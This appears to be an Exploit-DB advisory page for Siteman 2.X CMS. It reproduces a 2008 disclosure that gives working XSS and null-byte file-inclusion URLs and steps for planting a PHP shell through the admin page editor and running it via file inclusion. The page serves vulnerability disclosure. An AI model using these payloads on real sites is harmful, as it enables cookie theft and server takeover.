Siteman 2.X (0Day)

vendor:

Siteman

by:

IRCRASH (Dr.Crash Or Khashayar Fereidani)

7.5

CVSS

HIGH

Multiple Remote Vulnerabilities (CODE EXECUTION/LFI/XSS)

CWE

Product Name: Siteman

Affected Version From: Siteman 2.0.x2

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

The Siteman 2.X application is affected by multiple vulnerabilities including code execution, local file inclusion (LFI), and cross-site scripting (XSS). The code execution vulnerability allows an attacker to execute arbitrary code on the server. The LFI vulnerability allows an attacker to read files on the server. The XSS vulnerability allows an attacker to inject malicious code into the application. These vulnerabilities can be exploited remotely.

Mitigation:

To mitigate these vulnerabilities, it is recommended to update to the latest version of Siteman and implement proper input validation and output encoding in the application.

Source

Exploit-DB raw data:

#####################################################################################
####                         Siteman 2.X (0Day)                                  ####
####             Multiple Remote Vulnerabilities (CODE EXECUTION/LFI/XSS)        ####
#####################################################################################
#                                                                                   #
#AUTHOR : IRCRASH (Dr.Crash Or Khashayar Fereidani)                                 #
#Discovered by : IRCRASH (Dr.Crash Or Khashayar Fereidani)                          #
#IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr
#IRCRASH BUGTRAQ : http://bugtraq.ircrash.com/                                      #
#Original Advisory: http://ircrash.com/english/index.php?topic=29.0                 #
#####################################################################################
#                                                                                   #
#Script Download : http://mesh.dl.sourceforge.net/sourceforge/sitem/Siteman2.0.x2.zip
#                                                                                   #
#####################################################################################
#                                   < XSS >                                         #
#XSS Address : http://example/siteman2/index.php?module=</title> <script>alert(document.cookie)</script> <title>
#                                                                                   #
#####################################################################################
#                                   < LFI >                                         #
# Attention : Lfi And Code Execution Vuln , Work After Login With Admin User .      #
# For Login With Admin User You Can Attack With This Vuln : http://www.securityfocus.com/archive/1/458081
#LFI Address : http://example/index.php?module=../FILE%00
#####################################################################################
#                              < CODE EXECUTION >                                   #
# After Login With Admin User Go to :  "http://example/admin.php?module=pages&mdo=editpage&page=ircrash"
# Now Set Text Boxes :                                                              #
#-----------------------------------------------------------------------------------#
# Page Title : "IRCRASH"                                                            #
# KeyWords : "IRCRASH"                                                              #
# And Insert In Big Textbox : "<? your Shell Script ?>"                               #
#-----------------------------------------------------------------------------------#
# Now You Can Go Too "http://example/admin.php?module=../db/pages/ircrash.MYD%00" Or "http://example/index.php?module=../db/pages/ircrash.MYD%00"
# And  See Your Shell Script                                                        #
#####################################################################################
#                           Site : Http://IRCRASH.COM                               #
##################################TNX : GOD##########################################

# milw0rm.com [2008-04-26]